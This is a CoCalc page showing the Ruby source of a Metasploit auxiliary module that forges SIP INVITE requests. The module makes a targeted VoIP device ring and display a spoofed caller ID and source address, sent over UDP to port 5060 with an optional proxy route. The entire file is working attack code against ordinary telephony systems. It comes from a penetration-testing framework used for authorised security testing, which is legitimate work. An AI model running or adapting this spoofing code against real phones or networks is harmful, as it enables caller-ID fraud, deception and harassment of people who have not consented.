CoCalc -- sip_invite

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/sip_invite_spoof.rb
¹⁹⁵⁶⁷ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Scanner
9

10
  def initialize
11
    super(
12
      'Name' => 'SIP Invite Spoof',
13
      'Description' => %q{
14
        This module will create a fake SIP invite request making the targeted device ring
15
        and display fake caller id information.
16
      },
17
      'Author' => [
18
        'David Maynor <dave[at]erratasec.com>', # original module
19
        'ChrisJohnRiley' # modifications
20
      ],
21
      'License' => MSF_LICENSE,
22
      'Notes' => {
23
        'Stability' => [CRASH_SAFE],
24
        'SideEffects' => [],
25
        'Reliability' => []
26
      }
27
    )
28

29
    deregister_udp_options
30
    register_options(
31
      [
32
        Opt::RPORT(5060),
33
        OptString.new('SRCADDR', [true, 'The sip address the spoofed call is coming from', '192.168.1.1']),
34
        OptString.new('MSG', [true, 'The spoofed caller id to send', 'The Metasploit has you']),
35
        OptString.new('EXTENSION', [false, 'The specific extension or name to target', nil]),
36
        OptString.new('DOMAIN', [false, 'Use a specific SIP domain', nil])
37
      ]
38
    )
39
    register_advanced_options(
40
      [
41
        OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),
42
        OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])
43
      ]
44
    )
45
  end
46

47
  def run_host(ip)
48
    name = datastore['MSG']
49
    src = datastore['SRCADDR']
50
    ext = datastore['EXTENSION']
51
    dom = datastore['DOMAIN']
52
    sphost = datastore['SIP_PROXY_NAME']
53
    spport = datastore['SIP_PROXY_PORT'] || 5060
54
    conn_string = ''
55

56
    if !ext.nil? && !ext.empty?
57
      # set extension name/number
58
      conn_string = "#{ext}@"
59
    end
60

61
    if !dom.nil? && !dom.empty?
62
      # set domain
63
      conn_string << dom.to_s
64
    else
65
      conn_string << ip.to_s
66
    end
67

68
    # set Route header if SIP_PROXY is set
69
    if !sphost.nil? && !sphost.empty?
70
      route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
71
    end
72

73
    connect_udp
74

75
    print_status("Sending Fake SIP Invite to: #{conn_string}")
76
    print_status("Using SIP proxy #{sphost}:#{spport}") if route
77

78
    req = "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
79
    # add Route: header to req if SIP_PROXY is set
80
    req << route if route
81
    req << "To: <sip:#{conn_string}>" + "\r\n"
82
    req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
83
    req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"
84
    req << "Call-ID: #{rand(100..199)}#{ip}" + "\r\n"
85
    req << 'CSeq: 1 INVITE' + "\r\n"
86
    req << 'Max-Forwards: 20' + "\r\n"
87
    req << "Contact: <sip:#{conn_string}>" + "\r\n\r\n"
88

89
    udp_sock.put(req)
90
    disconnect_udp
91
  rescue Errno::EACCES => e
92
    vprint_error(e.message)
93
  end
94
end
95

96
Product

Resources

Company
